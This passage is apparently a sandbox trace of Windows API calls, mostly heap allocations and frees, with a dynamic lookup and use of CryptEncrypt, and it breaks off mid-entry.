PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.945] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.945] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.945] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34e9b20 | out: hHeap=0x25c0000) returned 1 [0188.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.951] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.952] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x178b5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x178b8) returned 1 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.956] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.957] CharLowerBuffW (in: lpsz="byte[96440]", cchLength=0xb | out: lpsz="byte[96440]") returned 0xb [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.957] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 